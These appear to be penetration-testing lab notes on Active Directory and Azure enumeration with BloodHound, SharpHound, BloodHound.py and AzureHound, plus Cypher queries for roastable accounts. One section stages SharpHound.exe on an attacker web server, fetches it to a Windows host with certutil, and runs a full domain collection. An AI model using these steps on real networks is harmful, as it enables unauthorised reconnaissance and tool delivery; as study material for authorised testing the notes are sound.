

BloodHound


  • install and run neo4j
  • start bloodhound gui
    # Distro package; the bullet above expects neo4j to be installed and running
    # first (presumably the package pulls it in — confirm with `apt show bloodhound`).
    sudo apt install -y bloodhound
    # --no-sandbox turns off the Electron/Chromium renderer sandbox; Chromium-based
    # apps refuse to start as root without it. Running the GUI as an unprivileged
    # user avoids needing the flag at all.
    bloodhound --no-sandbox
    
# Standalone GUI build, pinned to the v4.3.0 GitHub release archive
# (saved under its own name in the current directory).
bloodhound_zip_url=https://github.com/BloodHoundAD/BloodHound/releases/download/v4.3.0/BloodHound-linux-x64.zip
wget "$bloodhound_zip_url"

SharpHound.ps1

  • source: https://github.com/BloodHoundAD/BloodHound/blob/master/Collectors/SharpHound.ps1
    # Fetch the collector script into /opt/windows. This pulls from the master
    # branch rather than a tagged release, so the content may differ between
    # two runs of this line — unlike the pinned v4.3.0 GUI archive above.
    wget -O /opt/windows/SharpHound.ps1 \
      https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Collectors/SharpHound.ps1
    
# Load the collector into the current session (execution policy permitting)
# and run a full collection against the domain. The result is a single
# archive, azdump.zip, for import into BloodHound.
Import-Module .\SharpHound.ps1
Invoke-BloodHound -CollectionMethod All -Domain INLANEFREIGHT.LOCAL -ZipFileName azdump.zip
# Collection time grows with domain size; wait for the cmdlet to return
# before looking for the zip.

SharpHound


install

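# SharpHound collector, pinned to the v1.1.0 release, extracted under
# /opt/windows/sharpHound. The steps are chained with && so the archive is
# only deleted after a successful extraction; the original ran `rm`
# unconditionally and would discard the download if unzip had failed.
wget https://github.com/BloodHoundAD/SharpHound/releases/download/v1.1.0/SharpHound-v1.1.0.zip -O /opt/windows/SharpHound.zip \
  && unzip /opt/windows/SharpHound.zip -d /opt/windows/sharpHound \
  && rm /opt/windows/SharpHound.zip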
expose
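# Stage SharpHound.exe in a throwaway web root and serve it.
# The original joined mkdir and cd with a single `&`, which backgrounds mkdir
# and races it against cd (and runs the following lines regardless of
# failure); `&&` runs the steps in order and stops at the first one that fails.
www=/home/kali/workspace/www
mkdir -p -- "$www" \
  && cd -- "$www" \
  && cp /opt/windows/sharpHound/SharpHound.exe . \
  && python3 -m http.server 80
# http.server listens on every interface and serves the whole directory;
# port 80 needs root (or CAP_NET_BIND_SERVICE). Stop it (Ctrl-C) once the
# download is done, or restrict it to one interface with --bind <address>.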
delivery
# Download the staged binary with the built-in certutil (plain HTTP, no
# integrity check). Fetching files via `certutil -urlcache` is a well-known
# LOLBin pattern that endpoint tooling commonly flags.
certutil -urlcache -f http://192.168.45.226/SharpHound.exe SharpHound.exe
# Same download via wget: the staging host from the "expose" step above,
# over plain HTTP, so the binary arrives unauthenticated and unencrypted.
wget -O SharpHound.exe http://192.168.45.226/SharpHound.exe
run
# Full collection (--CollectionMethods All) against oscp.exam. --ExcludeDCs
# leaves domain controllers out of the host-level enumeration — verify the
# exact semantics for this build with `.\SharpHound.exe --help`.
.\SharpHound.exe --CollectionMethods All --Domain oscp.exam --ExcludeDCs
# Runtime grows with domain size; wait for the zip to be written before
# moving on.

BloodHound.py


BloodHound.py is a Python-based ingestor for BloodHound, built on Impacket.

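echo "==========> Windows:bloodHoundPy"
# Install the v1.0.1 source archive under /opt/windows/bloodHoundPy.
# The original `mv` used relative paths, so it only worked when the shell
# happened to be in /opt/windows; every path is now absolute, and the archive
# is only removed after a successful extraction and rename.
wget https://github.com/fox-it/BloodHound.py/archive/refs/tags/v1.0.1.zip -O /opt/windows/bloodHoundPy.zip \
  && unzip /opt/windows/bloodHoundPy.zip -d /opt/windows/ \
  && mv /opt/windows/BloodHound.py-1.0.1 /opt/windows/bloodHoundPy \
  && rm /opt/windows/bloodHoundPy.zip
# Collect everything (-c all) for the domain (-d), resolving names through
# the given nameserver (-ns; typically a domain controller).
# The password travels on argv, so it is visible in `ps` and kept in the
# shell history; the literal here is the notes' placeholder, not a real value.
/opt/windows/bloodHoundPy/bloodhound.py -u 'admin' -p 'xxxxxxxxxx' -ns '172.16.5.5' -d 'e-corp.com' -c all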

AzureHound


install

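echo "==========> Windows:AzureHound"
# AzureHound pinned to the v1.2.4 release, extracted into /opt/windows.
# Chained with && so a failed download or extraction does not reach `rm`;
# the original removed the archive unconditionally.
wget https://github.com/BloodHoundAD/AzureHound/releases/download/v1.2.4/azurehound-linux-amd64.zip -O /opt/windows/Azurehound.zip \
  && unzip /opt/windows/Azurehound.zip -d /opt/windows \
  && rm /opt/windows/Azurehound.zip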
dump all
# Pull every supported object type for the tenant in one run into all.json.
# Credentials are passed on argv (visible in `ps` and in the shell history);
# the values below are the notes' placeholders.
az_user='admin@e-corp.com'
az_pass='xxxxxxxxxx'
az_tenant='e-corp.com'
/opt/windows/azurehound -u "$az_user" -p "$az_pass" list --tenant "$az_tenant" -o all.json
dump one object type per call
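# Tenant credentials for the per-object-type dumps below.
# The original used USER/PASS/TENA and exported them: USER is the login name
# that many other tools read from the environment, so overwriting it is a
# footgun. The variables are renamed and deliberately not exported — only
# azurehound needs them and it receives them on its command line.
AZ_USER='admin@e-corp.com'
AZ_PASS='xxxxxxxxxxxxxxxx'   # placeholder from the notes; set the real value in the shell
AZ_TENANT='e-corp.com'

# Confirm the three values are populated without echoing the password to the
# terminal (the original printed all three); ${var:?msg} aborts with msg when
# the variable is unset or empty.
: "${AZ_USER:?set AZ_USER}" "${AZ_PASS:?set AZ_PASS}" "${AZ_TENANT:?set AZ_TENANT}"

/opt/windows/azurehound --help
/opt/windows/azurehound list --help

#######################################
# Run one `azurehound list` sub-command against the tenant and write the
# result to <object-type>.json in the current directory.
# Globals:   AZ_USER, AZ_PASS, AZ_TENANT (read)
# Arguments: $1 - object type as accepted by `azurehound list` (e.g. users)
#            $@ - any extra azurehound flags
# Outputs:   <object-type>.json
# Returns:   azurehound's exit status
#######################################
az_list() {
  local object=$1
  shift
  # Every expansion is quoted: the original's unquoted $PASS would be
  # word-split and glob-expanded if the password contained spaces or '*'.
  # The password still sits on argv, so it is visible in `ps` to other local
  # users while the command runs.
  /opt/windows/azurehound -u "$AZ_USER" -p "$AZ_PASS" list "$object" \
    --tenant "$AZ_TENANT" -o "${object}.json" -v 1 "$@"
}

az_list tenants
az_list users
az_list groups

az_list group-owners
az_list group-members

az_list management-group-descendants
az_list management-group-owners
az_list management-group-role-assignments
az_list management-group-user-access-admins
az_list management-groups   # the original omitted -v 1 here; now consistent with the rest

az_list roles
az_list role-assignments

az_list devices
az_list device-owners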

Analytics Queries


List all Kerberoastable Accounts

// Users with a servicePrincipalName set (hasspn) — the accounts the heading
// calls Kerberoastable.
MATCH (u:User)
WHERE u.hasspn = true
RETURN u

Find users that don't require Kerberos pre-authentication (aka AS-REP Roasting)

// Users whose account flags disable Kerberos pre-authentication; the WHERE
// form is equivalent to the inline {dontreqpreauth: true} property match.
MATCH (u:User)
WHERE u.dontreqpreauth = true
RETURN u

Find servers that members of the Domain Users group (RID 513) can RDP into.

// CanRDP paths from the well-known Domain Users group (objectid ending in
// RID -513) to computers whose operatingsystem string contains 'Server'.
MATCH p = (g:Group)-[:CanRDP]->(c:Computer)
WHERE g.objectid ENDS WITH '-513'
  AND c.operatingsystem CONTAINS 'Server'
RETURN p

Find all sessions any user in a specific domain has

// HasSession edges from any computer to users belonging to the given domain;
// the WHERE clause is equivalent to the inline {domain: ...} property match.
MATCH p = (c:Computer)-[:HasSession]->(u:User)
WHERE u.domain = "ZA.TRYHACKME.COM"
RETURN p

View all groups that contain the word ‘admin’

// Groups whose name contains ADMIN. CONTAINS is case-sensitive; BloodHound
// normally stores names upper-cased, hence the uppercase literal.
MATCH (g:Group)
WHERE g.name CONTAINS "ADMIN"
RETURN g

View all users that contain the word ‘admin’

// Users whose name contains ADMIN. CONTAINS is case-sensitive; BloodHound
// normally stores names upper-cased, hence the uppercase literal.
MATCH (u:User)
WHERE u.name CONTAINS "ADMIN"
RETURN u

View all computers

// Every Computer node in the database (no filter).
MATCH (c:Computer)
RETURN c;